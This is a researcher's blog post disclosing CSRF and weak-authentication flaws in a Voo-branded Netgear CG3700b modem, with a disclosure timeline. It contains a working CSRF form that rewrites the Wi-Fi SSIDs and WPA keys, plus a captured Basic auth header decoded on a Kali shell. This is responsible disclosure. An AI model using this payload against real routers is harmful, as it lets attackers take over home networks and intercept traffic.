Voo branded Netgear CG3700b Vulnerabilities

Just before I left for America, I found a few Netgear CG3700b vulnerabilities in my Voo branded modem.

Voo branded Netgear CG3700b Vulnerabilities - Introduction

As the 90 days have passed since disclosing it to the vendor (see timeline below), it was time for me to publicly disclose my findings and payloads.

CVEs are still pending, but I will add them to this post when I receive them.

Cross-Site Request Forgery (CSRF) on all form POSTs

The Voo branded Netgear CG3700b custom firmware (newest version, V2.02.03) allows a (context-dependent) attacker to perform a Cross-Site Request Forgery (CSRF) attack on all configuration setting (/goform/) page POST requests. By tricking a user into following a specially crafted link, an attacker can modify all settings including WEP/WPA/WPA2 keys, restore the router to factory settings, or even upload an entire malicious configuration file.

Before settings:

Netgear CG3700b Vulnerabilities - Before CSRF

Example CSRF form:

<form method="POST" name="form0" action="http://192.168.0.1/goform/index"
<input type="hidden" name="group_parametrage_wifi" value="active">
<input type="hidden" name="reseau_wifi_name" value="NEWSSID">
<input type="hidden" name="nom_select" value="AUTO-PSK">
<input type="hidden" name="canal" value=0>
<input type="hidden" name="mot_de_passe" value="NEWWPAKEY">
<input type="hidden" name="NBandwidth" value=20>
<input type="hidden" name="group_parametrage_wifi_an" value="active">
<input type="hidden" name="reseau_wifi_name_an" value="NEWSSID-5G">
<input type="hidden" name="nom_select_an" value="AUTO-PSK">
<input type="hidden" name="canal_an" value=0>
<input type="hidden" name="mot_de_passe_an" value="NEWWPAKEY-5G">
<input type="hidden" name="NBandwidth_an" value=20>
<input type="hidden" name="group_fon" value="desactiver">
<input type="hidden" name="buttonApply" value=1>
<input type="hidden" name="only_mode" value=0>
<input type="hidden" name="selected_ch_an" value=1>
</form>

After CSRF:

Netgear CG3700b Vulnerabilities - After CSRF

Insufficient Authentication (OWASP-A2)

This same modem handles authentication via basic authentication over the default (HTTP, non-ssl) connection. This allows an attacker to easily decode the base64 encoded username and password, and authenticate to the router. This only requires an attacker be on the same network as the router, and sniff the clear-text traffic.

Example:

POST http://192.168.0.1/goform/parametre_config HTTP/1.1
Host: 192.168.0.1
Connection: keep-alive
Content-Length: 24721
Cache-Control: max-age=0
Authorization: Basic dm9vOlBBU1NXT1JE

Screenshot:

Netgear CG3700b Vulnerabilities - Basic Auth

root@kali:~# cat voo.txt 
dm9vOlBBU1NXT1JE
root@kali:~# base64 --decode voo.txt 
voo:PASSWORD

Insufficient Authentication (OWASP-A2)

The Voo Netgear CG3700b also uses the same key for authentication to the administrative console as well as to the wireless by default.

If a WPA2 flaw were to be found that made cracking it simple, the HTTP basic authentication was brute forced (known charset of A-Z and 8 characters), or some other vulnerability found, then this would cause both systems to fail instead of just one.

Disclosure Timeline

  • 2016-01-22 - Discovered vulnerability, initially notified vendor.
  • 2016-01-23 - Requested CVE.
  • 2016-03-07 - Contacted vendor again, they notified me that they will not fix these issues at this time.
  • 2016-04-20 - Attempted to contact Mitre again to receive CVE.
  • 2016-04-21 - Sent to Full Disclosure.
  • 2016-04-23 - Additional information and full disclosure published here.
  • 2016-04-26 - Resent to Full Disclosure due to some errors.
  • 2019-06-20 - Requested CVEs again with the new form.

Voo branded Netgear CG3700b Vulnerabilities - Conclusion

All in all, a fun weekend, and a few good findings.

The vendor has not gotten back to me regarding a patch for these issues, but I know that some of their other offerings are allegedly less vulnerable.

I will add any additional information to this post as necessary, but you can find the FullDisclosure report here.

doyler on Githubdoyler on Twitter
doyler
Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he's done it all. To show for it, he has obtained an OSCE, OSCP, eCPPT, GXPN, eWPT, eWPTX, SLAE, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!

He currently serves as a Principal Penetration Testing Consultant for Secureworks. His previous position was a Senior Penetration Tester for a major financial institution.

When he's not figuring out what cert to get next or side project to work on, he enjoys playing video games, traveling, and watching sports.

Leave a Comment

Filed under Security Not Included

Leave a Reply

Your email address will not be published. Required fields are marked *

*

This site uses Akismet to reduce spam. Learn how your comment data is processed.